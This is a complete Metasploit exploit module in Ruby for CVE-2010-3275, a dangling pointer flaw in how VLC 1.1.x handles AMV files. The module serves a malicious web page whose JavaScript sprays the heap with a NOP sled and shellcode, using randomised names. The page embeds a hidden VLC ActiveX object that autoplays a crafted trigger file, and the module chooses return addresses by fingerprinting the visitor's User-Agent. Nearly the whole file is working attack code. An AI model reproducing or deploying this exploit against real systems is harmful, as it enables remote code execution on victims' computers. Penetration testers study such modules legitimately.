## # $Id: vlc_amv.rb 12140 2011-03-26 00:07:36Z sinn3r $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML def initialize(info={}) super(update_info(info, 'Name' => "VLC AMV Dangling Pointer Vulnerability", 'Description' => %q{ This module exploits VLC media player when handling a .AMV file. By flipping the 0x41st byte in the file format (video width/height), VLC crashes due to an invalid pointer, which allows remote attackers to gain arbitrary code execution. The vulnerable packages include: VLC 1.1.4 VLC 1.1.5 VLC 1.1.6 VLC 1.1.7 }, 'License' => MSF_LICENSE, 'Version' => "$Revision: 12140 $", 'Author' => [ 'sinn3r', ], 'References' => [ ['CVE', 'CVE-2010-3275'], ['URL', 'http://www.coresecurity.com/content/vlc-vulnerabilities-amv-nsv-files'], ], 'Payload' => { 'BadChars' => "\x00", 'space' => 1000, 'StackAdjustment' => -3500, }, 'DefaultOptions' => { 'ExitFunction' => "process", 'InitialAutoRunScript' => 'migrate -f', }, 'Platform' => 'win', 'Targets' => [ [ 'Automatic', {} ], [ 'Windows XP SP3 IE6', {'Ret'=>0x0c0c0c0c} ], [ 'Windows XP SP3 IE7', {'Ret'=>0x1c1c1c1c} ], ], 'DisclosureDate' => "Mar 23 2011", 'DefaultTarget' => 0)) end def getRet(cli, request) if target.name == 'Automatic' agent = request.headers['User-Agent'] case agent when /MSIE 6\.0/ return [0x0c0c0c0c].pack('V') * 8 when /MSIE 7\.0/ return [0x1c1c1c1c].pack('V') * 8 when /^vlc/ #VLC identifies itself as "VLC" when requesting our trigger file return "" when /^NSPlayer/ #NSPlayer is also used while requesting the trigger file return "" else return nil end else #User manually specified a target return [target.ret].pack('V') * 8 end end def exploit path = File.join(Msf::Config.install_root, "data", "exploits", "CVE-2010-3275.amv") f = File.open(path, "rb") @trigger = f.read f.close super end def on_request_uri(cli, request) #Determine if client is a potential victim either manually or automatically, #and then return the appropriate EIP nops = getRet(cli, request) if nops == nil send_not_found(cli) return end if request.uri.match(/\.amv/) print_status("Sending trigger file to #{cli.peerhost}:#{cli.peerport}") send_response(cli, @trigger, { 'Content-Type' => 'text/plain' } ) return end nopsled = Rex::Text.to_unescape(nops, Rex::Arch.endian(target.arch)) shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch)) js_func_name = rand_text_alpha(rand(6) + 3) js_var_blocks_name = rand_text_alpha(rand(6) + 3) js_var_shell_name = rand_text_alpha(rand(6) + 3) js_var_nopsled_name = rand_text_alpha(rand(6) + 3) js_var_index_name = rand_text_alpha(rand(6) + 3) trigger_file = datastore['URIPATH'] + "/" + rand_text_alpha(rand(6) + 3) + ".amv" html = <<-EOS <html> <head> <script> function #{js_func_name}() { var #{js_var_blocks_name} = new Array(); var #{js_var_shell_name} = unescape("#{shellcode}"); var #{js_var_nopsled_name} = unescape("#{nopsled}"); do { #{js_var_nopsled_name} += #{js_var_nopsled_name} } while (#{js_var_nopsled_name}.length < 82000); for (#{js_var_index_name}=0; #{js_var_index_name} < 3500; #{js_var_index_name}++) { #{js_var_blocks_name}[#{js_var_index_name}] = #{js_var_nopsled_name} + #{js_var_shell_name}; } } #{js_func_name}(); </script> </head> <body> <object classid="clsid:9BE31822-FDAD-461B-AD51-BE1D1C159921" codebase="http://downloads.videolan.org/pub/videolan/vlc/latest/win32/axvlc.cab" width="0" height="0" events="True"> <param name="Src" value="#{trigger_file}"></param> <param name="ShowDisplay" value="False" ></param> <param name="AutoLoop" value="no"></param> <param name="AutoPlay" value="yes"></param> </object> </body> </html> EOS #Remove extra tabs in HTML html = html.gsub(/^\t\t/, "") print_status("Sending malicious page to #{cli.peerhost}:#{cli.peerport}...") send_response( cli, html, {'Content-Type' => 'text/html'} ) end end